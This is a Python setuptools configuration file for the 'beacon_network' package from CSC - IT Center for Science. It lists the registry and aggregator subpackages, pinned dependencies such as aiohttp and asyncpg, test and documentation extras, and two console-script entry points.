from setuptools import setup
setup(
name="beacon_network",
version="1.4.0",
description="Beacon Network services",
long_description_content_type="text/markdown",
project_urls={
"Source": "https://github.com/CSCfi/beacon-network",
},
author="CSC - IT Center for Science",
classifiers=[
"Development Status :: 3 - Beta",
"Intended Audience :: Developers",
"Topic :: Internet :: WWW/HTTP :: HTTP Servers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.8",
],
packages=[
"aggregator",
"aggregator/config",
"aggregator/endpoints",
"aggregator/utils",
"registry",
"registry/config",
"registry/endpoints",
"registry/schemas",
"registry/utils",
],
package_data={"": ["*.json", "*.ini"]},
install_requires=[
"asyncio==3.4.3",
"aiohttp==3.8.1",
"aiohttp-cors==0.7.0",
"aiocache==0.11.1",
"aiomcache==0.6.0",
"ujson==4.3.0",
"uvloop==0.14.0; python_version < '3.7'",
"uvloop==0.16.0; python_version >= '3.7'",
"asyncpg==0.25.0",
"jsonschema==4.2.1",
"gunicorn==20.1.0",
],
extras_require={
"test": [
"coverage==6.2",
"pytest<6.3",
"pytest-cov==3.0.0",
"testfixtures==6.18.3",
"tox==3.24.4",
"flake8==4.0.1",
"flake8-docstrings==1.6.0",
"asynctest==0.13.0",
"aioresponses==0.7.2",
"black==21.12b0",
],
"docs": ["sphinx >= 1.4", "sphinx_rtd_theme==1.0.0"],
},
entry_points={
"console_scripts": ["beacon_registry=registry.registry:main", "beacon_aggregator=aggregator.aggregator:main"],
},
)
| 1.703125 | 2 |
Subsets and Splits